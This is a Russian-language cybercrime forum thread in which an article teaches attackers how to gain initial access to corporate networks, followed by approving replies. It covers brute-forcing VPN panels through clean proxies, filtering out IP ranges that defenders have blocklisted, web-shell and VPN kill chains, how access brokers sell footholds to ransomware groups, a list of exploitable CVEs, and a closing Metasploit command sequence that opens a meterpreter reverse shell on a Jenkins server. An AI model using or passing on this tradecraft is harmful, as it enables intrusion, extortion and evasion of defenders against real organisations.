• [ Регистрация ]Открытая и бесплатная
  • Tg admin@ALPHV_Admin (обязательно подтверждение в ЛС форума)

Статья Способы получения первоначального доступа (initial access)

Jittery

Новорег
Registered
Регистрация
22.02.2025
Сообщения
6
Розыгрыши
0
Реакции
0
Jittery не предоставил(а) никакой дополнительной информации.
Брутчекеры предоставил: RedTeam
Сетка для тестов codeby


Вступление


Все наверное наслышаны про группировку "DumpForums", которая активно показывает свои успешные атаки.
Спойлер: хек



Давайте разберемся как получить начальный доступ. Надеюсь данная статья будет полезна людям, которые держат свою небольшую инфраструктуру и не осведомлены о самых распространенных способах попасть в домен.

Для начала представим, что у нас свое королевство "домен". Разберемся каким корпоративным ПО будем пользоваться или же наши сотрудники, которое в теории может торчать из вне. В первую очередь наши сотрудники должны безопасно подключаться и запускать приложения в корпоративной сети. В этом нам поможет как ни странно корпоративный VPN.
Корпоративный VPN - как один из способов получить доступ
Корпоративные VPN (виртуальные частные сети) позволяют пользователям отправлять и получать информацию через общедоступную сеть так же безопасно, как если бы они были напрямую подключены к частной сети.

Как работают корпоративные VPN: VPN создают частную сеть через публичное интернет-подключение. Они предоставляют пользователям анонимность и конфиденциальность, скрывая их IP-адрес и защищая их соединения с помощью шифрования. Они также позволяют администраторам настраивать детализированный контроль доступа, который ограничивает доступ пользователей к областям сети, которые им не нужны.

Представьте себе VPN как секретный туннель между устройством пользователя и Интернетом; никто не может видеть, что пользователь делает внутри туннеля, кроме него самого и того, кому он отправляет данные, — даже поставщик интернет-услуг.

Давайте пока просто соберем полезную информацию и далее уже проанализируем. А в конце статьи получим доступ благодаря эксплоиту.




Check Point SASE — это надежная, быстрая, простая в развертывании, облачная платформа ZTNA. Она совместима с устройствами Windows, Mac, iOS, Android, Linux и Chromebook, а также со всеми основными поставщиками облачных услуг.
OpenVPN Access Server — это программное обеспечение VPN-сервера с собственным хостингом, которое обеспечивает безопасный удаленный доступ к частным сетям в облаке или локально. Пакет Enterprise предлагает индивидуальные цены для 500+ подключений.
Cisco AnyConnect — это управляемый политиками инструмент VPN, предназначенный для защиты сетевого доступа удаленных работников через проводные, беспроводные и VPN-подключения. Решение обеспечивает безопасный доступ к сети с любого устройства, в любое время и из любого места. Это Мощное масштабируемое VPN-решение для всех крупных предприятий, но особенно для тех, которые уже инвестировали в продукты кибербезопасности от Cisco. Информацию о ценах можно получить в Cisco по запросу.
Citrix Secure Private Access для крупных предприятий с удаленной или гибридной рабочей силой. Он также хорошо подходит для защиты подключений с устройств BYOD.
FortiClient — это мощный корпоративный VPN, который обеспечивает безопасный, но быстрый удаленный доступ. Его легкая архитектура, быстрые соединения и интуитивно понятный интерфейс позволяют ему обеспечивать высокий уровень безопасности, не нарушая производительности конечных пользователей.
SonicWall Global VPN Client (GVC) — один из четырех VPN-сервисов SonicWall. С помощью этого решения организации могут разрешить управляемым устройствам безопасно получать доступ к своим центрам обработки данных с помощью привычного удаленного VPN-опыта. VPN от SonicWall совместим с Windows, Mac, Android, iOS, ChromeOS, Linux и Amazon Kindle Fire.




- Если используют пароль для доступ к панельки впна - это беда, нужно хотя бы накрыть MFA или сертификатом

У каждой компании как правило есть свой бложик в котором есть инфа про обновы, патчи. Например: Для просмотра ссылки Войди или Зарегистрируйся

Если чуть посерфить можно разобраться какие CVE`шки актуальны. Если клиент не поставил патч, не обновляет систему автоматически, то мы можем проэксплуатировать уязвимость.





. Запретите локальным учетным записям подключаться к VPN с аутентификацией только по паролю и другие полезные советы можно найти в блогах компаний, которые поставляют впн решения.

Компании также могут оставлять пуллы айпи адресов с которых происходят атаки. Необходимо их парсить и вычленять из своего листа прокси, нужно использовать чистые соксы, чтобы избежать блокировок или пропусков.

Код: Скопировать в буфер обмена
Код:
5.188.218.0/23
23.227.196.88
23.227.203.36
31.134.0.0/20
37.9.40.0/21
37.19.205.180
38.180.54.104
38.180.54.168
45.135.1.0/24
45.135.2.0/23
45.155.166.0/23
46.59.10.72
46.183.221.194
46.183.221.197
61.92.2.219
64.176.196.84
68.183.56.130
82.180.133.120
85.239.42.0/23
87.206.110.89
88.218.44.0/24
91.132.198.0/24
91.218.122.0/23
91.245.236.0/24
103.61.139.226
104.207.149.95
109.134.69.241
112.163.100.151
132.147.86.201
146.70.205.62
146.70.205.188
146.185.207.0/24
149.88.22.67
154.47.23.111
156.146.56.136
158.62.16.45
162.158.162.254
167.61.244.201
167.99.112.236
178.236.234.123
183.96.10.14
185.213.20.20
185.217.0.242
192.71.26.106
193.233.128.0/22
193.233.216.0/21
195.14.123.132
198.44.211.76
203.160.68.12
217.145.225.0/24
221.154.174.74

Взламывая учетные записи VPN, злоумышленники могут проникнуть в сеть. Они избегают обнаружения, маскируя вредоносные программы и вредоносные действия под легитимные процессы.
kill chain
1) Давайте посмотрим на классическую атаку с загрузкой веб шелла








Хронология атаки через веб-шелл, демонстрирующая хронологический порядок событий.


Залили шелл .aspx, получили шелл, провели разведку, создали аккаунт локального админа если позволяют права, прокинули сокс для доступа во внутрянку.

2) Взлом учетной записи VPN происходит, когда злоумышленник получает доступ к учетной записи VPN с помощью таких методов, как фишинг, эксплуатация уязвимостей или получение слабых учетных данных для входа. Оказавшись внутри, злоумышленник может выполнять вредоносные действия, используя скомпрометированную учетную запись, что позволяет ему проникнуть в сеть и обойти средства защиты. В зависимости от уровня доступа они могут перемещаться по горизонтали к высокоценным системам и развертывать дополнительные полезные нагрузки, такие как программы-вымогатели.

Начальный доступ: Ранние действия показали вход с IP-адреса VPN, исходящего с рабочей станции, которая соответствует соглашению об именовании среды хостов. Это могло помочь злоумышленнику замаскироваться и избежать немедленного подозрения.

"соглашению об именовании среды хостов" - я предполагаю амеры имели ввиду, что доброумышленник нашел ip сервера где хостится контора и купил себе сокс, который не привлечет внимания. К примеру узнал с какого города подключаются сотрудники и прорвался таким образом в впн панельку. А если б он заходил с Китая, то его быстренько бы выкинули.

Устойчивость: Злоумышленник развернул AnyDesk в среде и создал учетки., которые вместе со скомпрометированными добавил в группу «Пользователи удаленного рабочего стола» чтобы иметь доступ по RDP.

Уклонение от защиты: Пользовались легитимными инструментами, такими как anydesk.exe, net.exe. Помещали их в каталоги с именами «programdata» и «systemtest», чтобы возникло меньше подозрений.

Боковое перемещение: Использовали rdp, чтобы подключаться к скомпрометированным учеткам, wmiexec для выполнения удаленных команд.





Цепочка атак, показывающая события, произошедшие после успешной компрометации учетной записи VPN.


Подведем небольшие итоги. В большинстве своем все проблемы исходят потому что люди не следят за обновлениями ПО, так например заливали шелл в exchange. В 2025 до сих пор используют пароли без MFA.

По сути чтобы получить доступ достаточно раздобыть норм мат url;log;pass, приобрести/добыть хорошие прокси, которые еще не засветились у ресерчеров. Если вашими проксями уже кто-то брутил, то вы получите очень много пропусков. Вот к примеру смотрите




Человек с forum.mikrotik.com ведет свою собственную базу, вносит ip в блэклисты с которых происходили bruteforce атаки.

Рассмотрим некоторые обзоры американских ресерчеров

Далее я ознакомился с "flare" - это иностранная контора. Нам не особо интересно чем она занимается, лучше поговорим о статистике которую она привела. 36% доступов - это США контора, средний доступ стоит 1300$ (от 150$ до 100k$), селлеры также пишут, что есть доступ к бэкапам, чтобы доступ ушел быстрее (понятно почему), торгуют доступами на exploit, поставщиков доступов не так уж и много по словам flare, продают в основном RDP и VPN.

формат объявлений

  • Тип доступа : Описывает тип полученного доступа, чаще всего это доступ RDP или VPN.
  • Отрасль/Деятельность: Описывает отрасль компании-жертвы. Финансы(обычно эта информация есть в интернете), розничная торговля и производство — три наиболее частые цели.
  • Уровень доступа / Права : Описывает уровень полученных привилегий.
  • Доход: описывает доход компании-жертвы, часто получаемый от поставщиков данных из США, которые находятся в открытом доступе в Интернете.
  • Host Online: часто описывает количество хостов жертвы и иногда включает в себя антивирусные и действующие системы безопасности(defender и т.д).
  • Старт: Начальная цена аукциона.
  • Шаг: ставка увеличивается.
  • Блиц: Цена «купить сейчас».
Также компания flare пишет, что объявления выставляют в телеграм чатах, каналах, но думаю в ближайшее время это будет оч не актуально. Поскольку телеграм удаляет любую незаконную деятельность, о чем недавно открыто сообщили в официальном канале. Как заявляют flare доступы продаются на xss и exploit, а также в торе.




А вот и статистика по гео подъехала.





В США находятся некоторые из самых дорогих компаний в мире, а также самый высокий в мире ВВП, что делает страну привлекательной целью для злоумышленников.

Во многих случаях варианты программ для кражи информации настроены на автоматическое отключение при запуске на хостах в стране, входящей в коалицию независимых государств (СНГ), что несколько ограничивает потенциальные страны для атаки.

Тот факт, что форум является российским, может помешать субъектам угроз публиковать информацию о нейтральных или союзных России целях, одновременно побуждая их выбирать страны, враждебные России. - мнение flare=)) А Украинцы тоже выбирают Америку потому что на враждебная)))))

Мы насчитали 31 уникальное имя пользователя, продающее доступ к корпоративным ИТ-средам; однако семь основных субъектов были ответственны за большинство (55,6%) листингов. - эксперты насчитали 30+ селлеров доступов на экспе, 7 из которых проявляли самую большую активность. В целом они правильно подошли к тому, что статистику подводили на exploit, а не на xss.is. Все дело в том, что на экспе регистрация стоит 200 баксов и как бы нихуя себе, каждый день акки мало кто захочет менять в отличии от xss, где можно акк для безопасности менять после каждой сделки.

Мы рекомендуем отслеживать Exploit, XSS и другие форумы IAB, чтобы получать предварительное уведомление о том, что доступ к вашей среде может быть выставлен на продажу. - пишет flare.
Они имеют ввиду, что селлер указывает revenue по которому можно понять +- что это за контора. Поэтому лучше чаще менять ники на форумах, а revenue указывать диапазоном.

Понимание системы программ-вымогателей​

часто доступы ассоциируются с шифровальщиками. Но на деле это не совсем так, доступы могут применяться и в других целях. Но мы все же кратко рассмотрим как все устроено, думаю новичкам будет интересно.



Initial Access Broker (IAB) - звено в цепи шифровальщиков, которое поставляет мат, то есть доступ. Их задача просто искать url;log;pass и брутить впны в большинстве своем. Кто покруче, более "творческий" использует 0day или фишинг. 0day - это уязвимость о которой уже знает вендор, но патч еще не вышел. Hack Forums, Breached, Nulled, CryptBB - это форумы на которых чаще всего продают доступы иностранные друзья. Стоит отметить, что доступ либо сдается в аренду (то есть под %), либо продается за фиксированную стоимость.
Оператор-программы-вымогателя - это группа лиц или отдельное лицо, которая занимается брендом, привлекает народ, рекламирует программу. Репутация - это самое дорогое у шифровальщиков, если зашифровать не тот объект (например больницу) или же не отдать ключи шифрования после получения выкупа, то придется делать ребрендинг :d
Data Manager - это группа лиц или отдельное лицо, которое обрабатывает данные корпорации. То есть удаляет дубликаты, проверяет данные на критичность, держит инфраструктуру с украденными данными, делает бэкапы, выкладывает публично или продает, в случае если не был получен выкуп.
Партнер по вымогательству - не все могут позволить себе разработать локер, поэтому берут уже хорошо сделанный продукт и платят %.
Переговорщик в экосистеме RaaS — это человек, который берет на себя задачу общения с жертвой (или представитель, т. е. специалист по переговорам с вымогателями). Наряду с записками о выкупе во многих кампаниях с вымогателями также может быть ссылка или контактные данные для связи. Задача этого специалиста получить как можно больший выкуп за короткий промежуток времени. Почему корпорации платят? Разные на то причины у кого то нет бэкапов, кто-то боится штрафов или раскрытия информации после которой придется закрыть предприятие) А если это больница, то там на счету человеческие жизни, если даже есть резервная копия данных, то пока это все восстановят могут погибнуть люди.
Для просмотра ссылки Войди или Зарегистрируйся тут можно почитать интересные чаты с вымогателями. От себя добавлю, что помимо ключа шифрования, у некоторых партнерок есть возможность купить отчет по найденным уязвимостям, а также можно купить пруф что данные удалены. Не совсем уверен как это можно подтвердить ну ладно)
Chaser - это своего рода коллектор. Может обзванивать, слать письма, привлекать внимание, чтобы жертва быстрее оплатила выкуп. Был случай, когда распечатывали на принтерах организации письмо о том, что необходимо оплатить выкуп)))
Бухгалтер - тот кто отмывает полученные деньги. Могут использоваться миксеры. Обычно выкуп принимается в BTC, т.к эта монета сама ликвидная. Или из рода анонимных monero (xmr),

Думаю теперь +- ясно кто за что отвечает. А потом выкуп делиться на всю цепочку.

Программное обеспечение, которое широко используется в организациях.

Мы поговорили про owa, корпоративные впны, но совсем не обсудили какие ПО можно использовать для получения первоначального доступа. Также я составлю лист CVE, которые используют различные APT, а в конце статьи перейдем уже наконец к практике=)

CI/CD, или непрерывная интеграция/непрерывная доставка или развертывание, - это практика разработки программного обеспечения, обеспечиваемая автоматизацией. Частые и надежные обновления ускоряют циклы выпуска благодаря непрерывной доставке кода.




Вот список CI/CD решений.

Jenkins — широко используемый инструмент с открытым исходным кодом, доля которого на рынке CI/CD составляет 45 %, согласно данным Для просмотра ссылки Войди или Зарегистрируйся . По состоянию на август 2023 года более 11 миллионов разработчиков использовали Jenkins для почти 49 миллионов рабочих нагрузок по всему миру. Около 50 000 неисправленных экземпляров Jenkins в январе, когда CVE была впервые раскрыта.

Вот тут подробнее про CI/CD инструменты: Для просмотра ссылки Войди или Зарегистрируйся

Если вы хотите знать чуть больше других, то можете просто начать читать сайберсек блоги, чтобы понимать как получают initial access. Допустим мы знаем какой СОФТ используют корпорации (банально я привел на картинке и на хабре 38 инструментов CI/CD) возьмем в пример какой то нашумевший к примеру "Jenkins". Просто гуглим "Jenking initial access"




А вот собственно говоря kill chain. Человек с BF получает доступ к Jenkins server благодаря CVE-2024-23487, забирает SSH ключики, дампит все репозитории, извлекает секреты и далее проникает в другие сервисы.




А вот еще один killchain, Получили начальный доступ с помощью jenkins, который торчал внешне. Далее установили XMRig miner, запустил майнер. Таким образом доступы используют не только шифровальщики, на них еще можно майнить крипту. Стоит отметить что хакеры используют продуманные скрипты, которые сначала проверяют права на запись и только потом подгружают бинарь. Если нет прав, то записывают в /tmp. Также curl, wget может быть недоступен, тогда скрипт пытается загрузить бинарь с помощью openssl s_client -connect remote_host:port к примеру.






С помощью censys можно посмотреть сколько хостов с jenkins торчат извне. Далее форму можно брутать или использовать эксплоиты.

Надеюсь я вас не утомил. Но я хочу рассказать еще про один вариант, чтобы подтвердить, что доступы используют не только для шифровки)))




Взгляните этот killchain. Уязвимая среда Jenkins (Для просмотра ссылки Войди или Зарегистрируйся) позволила злоумышленнику заблокировать пользователя, тем самым потерян доступ. Далее на этих облачных сервисов можно майнить крипту или что хуже просить выкуп.




Прикладываю статистику самых используемых CI/CD.




Стоит отслеживать сайберсек блоги американские. Там можно найти много полезной инфы.

Далее давайте соберем список CVE которые можно использовать первоначального доступа

старье, которое я нашел в каком-то сайберсек блоге. Поэтому я составлю свой список.
VulnerabilityAssociated Software
CVE-2017-3066Apache BlazeDS library
CVE-2017-7269Microsoft Windows Server 2003 R2
CVE-2017-10271Oracle WebLogic Server
CVE-2018-13379Fortinet FortiOS and FortiProxy
CVE-2019-0604Microsoft SharePoint
CVE-2019-19781Citrix Application Delivery Controller
CVE-2019-11510Pulse Connect Secure
CVE-2019-9670Synacor Zimbra Collaboration Suite
CVE-2019-18935ASP.NET AJAX
CVE 2020-0688
CVE-2021-26855
CVE-2021-26857
CVE-2021-26858
CVE-2021-27065
CVE 2020-17144
Microsoft Exchange Server
CVE-2021-44228Apache Log4j2
CVE-2020-10189Zoho ManageEngine Desktop Central
CVE-2020-5902BIG-IP

мой список

CVE-2024-43044 Jenkins Для просмотра ссылки Войди или Зарегистрируйся Для просмотра ссылки Войди или Зарегистрируйся
CVE-2023-42793 Authentication Bypass in JetBrains TeamCity CI/CD
CVE-2024-27198 обход аутентификации с использованием уязвимости альтернативного пути в JetBrains
CVE-2024-27199 TeamCity server Для просмотра ссылки Войди или Зарегистрируйся
CVE-2024-9264 Grafana
CVE-2023-22522 confluence
CVE-2024-47575 RCE FortiJump
CVE-2024-21683 confluence Для просмотра ссылки Войди или Зарегистрируйся
Sonicwall rce CVE-2023-34124
CVE-2023-24489 Для просмотра ссылки Войди или Зарегистрируйся
Microsoft Exchange ProxyNotShell RCE Для просмотра ссылки Войди или Зарегистрируйся

думаю этого более чем достаточно на первых порах=))

Получаем доступ благодаря уязвимому jenkins

кодер RedTeam прислал свой мультитул в котором есть брут всех cms, впнов. Я выбрал jenkins.




Получили валидные креды админа.




Ну все. Получаем reverse shell.

Код: Скопировать в буфер обмена
Код:
msfconsole
 use exploit/multi/http/jenkins_script_console
 show targets - выбираем windows если выбран linux
 set payload windows/x64/meterpreter/reverse_tcp - куда будем ловить
 set RPORT 8080
 set RHOSTS ip
 set targeturi /
 set username admin
 set password Qwerty11!
 set LHOST 10.0.0.95
 run




Спасибо, всем хорошего настроения.
 
Так а где его взять?) Скрытая реклама?)
 
Эх жаль нужен хотя бы Viewer permission, а та Графана что мне нужна - в ней авторизация через Okta. печаль.

Статья супер!
 
в msf есть модуль для брута Jenkins
 
Последнее врем большинство статей стало с ненавязчивой рекламой левого софта, непонятно от кого

Почему такие статьи пропускают - вопрос
Но щас как всегда мне налепят дизов с мульт-акков... и все про всё забудут
 
Для просмотра ссылки Войди или Зарегистрируйся раз на то пошло я готов подтвердить свои скиллы. Я воздух не пускаю.
 
У меня для вас посылка, с мультитулом для брута всех впн, только я вам её не отдам...
 
Very good written article. I didn't know that a ransomware team is that complex lol
 
thx bro=)))

if you're interested in the subject of networks more content can be found at ........
 
Thx bro
I am waiting for confirmation
 
кто-то может подсказать более актуальный способ получения первоначального доступа , брутить впн-гейт например модуль мсф fortinet-fortigate-vpn на какие-то популярные логины или искать сетки где наружу торчит 445 порт и брутить юзеров и потом уже по ним гонять пароли в надежде на успех?
 
актуален любой который работает для данной конкретной цели или группы однотипных целей.
вот они как на ладони все эти initial access тактики Для просмотра ссылки Войди или Зарегистрируйся и новое тут придумать крайне сложно.

помимо собственно самого "Для просмотра ссылки Войди или Зарегистрируйся , который многие новички по ошибке и считают "хакингом" хотя это не так, рекомендую всё же обратить внимание на то куда его получать (Для просмотра ссылки Войди или Зарегистрируйся) и Для просмотра ссылки Войди или Зарегистрируйся (промежуточные казалось бы "незначительные мелочи" и ресурсы которые могут очень помочь)

а "Для просмотра ссылки Войди или Зарегистрируйся" он вообще находится в другом месте, не путаем credential access и initial access (который может быть и без credentials) хотя согласен грань тонкая между ними.

также очень настоятельно рекомендую по ссылкам курить литературу читать References внизу конкретных тактик - там "между строк" невзначай могут быть описаны "best practices" полезные для black hat.

удачной охоты!
 
Не о чем же написал) Брут жить будет вечно.. если конечно с переменной каждого запроса
 
Отличная статья!
Выписываю благодарность автору =)
 
Activity
So far there's no one here